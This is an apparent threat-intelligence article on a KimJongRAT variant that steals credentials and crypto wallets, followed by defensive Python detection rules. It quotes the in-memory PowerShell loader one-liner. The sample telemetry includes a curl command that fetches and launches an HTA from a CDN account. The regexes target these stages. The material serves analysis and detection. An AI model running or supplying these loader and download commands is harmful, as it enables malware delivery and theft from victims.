A sophisticated evolution of the KimJongRAT malware family has emerged, demonstrating advanced techniques for credential theft and system compromise through weaponized Windows shortcut files and PowerShell-based payloads.
This latest campaign represents a significant advancement over earlier variants, incorporating both Portable Executable (PE) and PowerShell implementations that specifically target cryptocurrency wallet extensions and sensitive browser data.
The malware’s multi-stage deployment architecture leverages legitimate content delivery network services to mask malicious activity, making detection considerably more difficult for traditional security solutions.
The attack begins with deceptively named LNK files, such as “성범죄자 신상정보 고지.pdf.lnk”, suggesting the campaign may be targeting Korean-speaking users with social engineering tactics designed to exploit public safety concerns.
These initial files serve as sophisticated downloaders that lay the foundation for a complex infection chain involving multiple file types and deployment stages.
Palo Alto Networks researchers identified that this new variant represents a substantial departure from the original KimJongRAT stealer first documented in 2013, incorporating modern evasion techniques and expanded targeting capabilities.
The malware’s developers have demonstrated remarkable adaptability, continuously updating their tools to bypass existing security measures while expanding their focus to include the lucrative cryptocurrency sector.
The research reveals two distinct implementation approaches: a traditional PE variant and an innovative PowerShell-based version, both designed to maximize data exfiltration while maintaining persistence on infected systems.
Malware execution chain (Source – Palo Alto Networks)
The economic implications of this campaign are particularly concerning given the malware’s extensive focus on cryptocurrency wallet extensions, with the PowerShell variant targeting over 40 different browser extensions including MetaMask, Trust Wallet, Exodus Web3 Wallet, and numerous other popular cryptocurrency management tools.
This comprehensive targeting approach suggests the attackers are well-informed about the cryptocurrency ecosystem and are positioning themselves to capitalize on the growing adoption of digital assets among both individual users and organizations.
Multi-Stage Infection Mechanism and Payload Deployment
The infection mechanism employed by this KimJongRAT variant demonstrates a sophisticated understanding of Windows security architecture and user behavior patterns.
Upon execution, the initial LNK file uses legitimate Windows utilities, including cmd.exe and curl.exe, to download an HTA (HTML Application) file from attacker-controlled accounts on cdn.glitch.global, a legitimate CDN service.
This approach provides several advantages for the attackers, including the ability to host malicious content on trusted infrastructure while avoiding direct attribution to their own servers.
The downloaded HTA file, typically named either “pdf.hta” or “sfmw.hta” depending on the variant, contains obfuscated VBScript code alongside multiple Base64-encoded payloads embedded within the file structure.
The PowerShell variant’s HTA file specifically drops two critical components: a decoy PDF document designed to maintain the illusion of legitimate content, and a ZIP archive containing the actual malware components.
The decoy documents typically relate to Korean administrative forms, reinforcing the apparent geographic targeting of this campaign.
Malware execution chain of the latest PowerShell variant (Source – Palo Alto Networks)
Extracting the ZIP archive reveals a carefully orchestrated deployment system comprising four distinct files: “1.ps1” (PowerShell loader), “1.log” (Base64-encoded stealer), “1.vbs” (persistence mechanism), and “2.log” (keylogger module).
The PowerShell loader employs a simple yet effective approach, using the Invoke-Expression cmdlet to decode and execute the Base64-encoded stealer directly in memory, as demonstrated by the code snippet: iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content $args)))).
The stealer component implements comprehensive anti-analysis measures, including VMware detection via UUID examination and automatic deletion of the malicious files when a virtual machine environment is detected.
The malware establishes persistence via Windows registry modification, creating an entry under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” with the value name “WindowsSecurityCheck” that ensures automatic execution on system startup.
This persistence mechanism, combined with the malware’s ability to operate entirely through legitimate system utilities and PowerShell, makes detection via traditional signature-based methods extremely difficult while providing attackers with long-term access to compromised systems.
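The chain described above (LNK running cmd.exe/curl.exe to fetch an HTA from cdn.glitch.global, a PowerShell loader that base64-decodes a .log file into Invoke-Expression, and a Run-key entry named WindowsSecurityCheck) gives a defender three concrete places to look. The following Python is an added example, not code from the article or from Palo Alto Networks: it runs simple detection rules over constructed process-creation events, a PowerShell script block and a Run-key listing modelled on the article's description, and includes a helper for decoding a quarantined Base64 stage so an analyst can read it without executing it. All file paths, the account name in the URL and the sample log lines are placeholders invented for this example.

```python
import base64
import re

# --- Constructed sample telemetry (not real logs; paths and the CDN account are placeholders) ---
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl.exe -o %TEMP%\pdf.hta https://cdn.glitch.global/placeholder-account/pdf.hta && start %TEMP%\pdf.hta",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\1.ps1 C:\Users\user\AppData\Local\Temp\1.log",
     "parent": r"C:\Windows\System32\wscript.exe"},
    # Benign control line that must not fire any rule
    {"image": r"C:\Program Files\Git\cmd\git.exe", "cmdline": "git fetch origin",
     "parent": r"C:\Windows\explorer.exe"},
]

# The loader one-liner quoted in the article, as it would appear in PowerShell script-block logging
SAMPLE_SCRIPT_BLOCK = "iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content $args))))"

# Constructed Run-key listing: one legitimate value and one modelled on the article's persistence entry
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WindowsSecurityCheck": r'wscript.exe "C:\Users\user\AppData\Local\Temp\1.vbs"',
}

# Constructed stand-in for a quarantined "1.log": a harmless string, Base64-encoded the same way
SAMPLE_LOG_B64 = base64.b64encode(b"Write-Host 'constructed placeholder stage'").decode()

# --- Detection rules ---
# Stage 1: curl pulling an .hta from the CDN named in the article
CURL_HTA = re.compile(r"curl(\.exe)?\b.*\bcdn\.glitch\.global\b.*\.hta\b", re.I)
# Stage 2: Invoke-Expression over FromBase64String(Get-Content ...), i.e. decode-a-file-then-run
IEX_B64_FILE = re.compile(r"\biex\b.*FromBase64String\s*\(\s*\(?\s*Get-Content\b", re.I)
# Stage 3: the Run value name reported for this variant
SUSPECT_RUN_NAMES = {"WindowsSecurityCheck"}


def detect_process_events(events):
    """Return (rule_name, cmdline) hits for process-creation events."""
    hits = []
    for ev in events:
        if CURL_HTA.search(ev["cmdline"]):
            hits.append(("stage1_lnk_curl_hta", ev["cmdline"]))
        # powershell.exe launched with a .ps1 and a .log argument matches the 1.ps1 / 1.log pairing
        if ev["image"].lower().endswith("powershell.exe") and re.search(r"\.ps1\b.*\.log\b", ev["cmdline"], re.I):
            hits.append(("stage2_ps_loader_log_arg", ev["cmdline"]))
    return hits


def detect_script_block(text):
    """True when a script block shows the iex(FromBase64String(Get-Content ...)) loader shape."""
    return bool(IEX_B64_FILE.search(text))


def detect_run_key(values):
    """Return Run-key value names that match the reported name or launch a .vbs from a Temp folder."""
    flagged = []
    for name, cmd in values.items():
        launches_temp_vbs = re.search(r"\.vbs\b", cmd, re.I) is not None and "temp" in cmd.lower()
        if name in SUSPECT_RUN_NAMES or launches_temp_vbs:
            flagged.append(name)
    return flagged


def decode_base64_stage(b64_text):
    """Decode a Base64-encoded stage (the role 1.log plays) for reading, never for execution."""
    return base64.b64decode(b64_text.strip()).decode("utf-8", errors="replace")


if __name__ == "__main__":
    for rule, cmd in detect_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[process] {rule}: {cmd}")
    print(f"[scriptblock] loader pattern: {detect_script_block(SAMPLE_SCRIPT_BLOCK)}")
    print(f"[run key] flagged values: {detect_run_key(SAMPLE_RUN_KEY)}")
    print(f"[decoded stage] {decode_base64_stage(SAMPLE_LOG_B64)}")
```

The rules are deliberately narrow (the CDN host, the loader shape and the Run value name come straight from the article), so they are low-noise but will miss a renamed value or a different CDN; the `.vbs`-from-Temp check in `detect_run_key` is the one generalization, catching the persistence stub even if its value name changes.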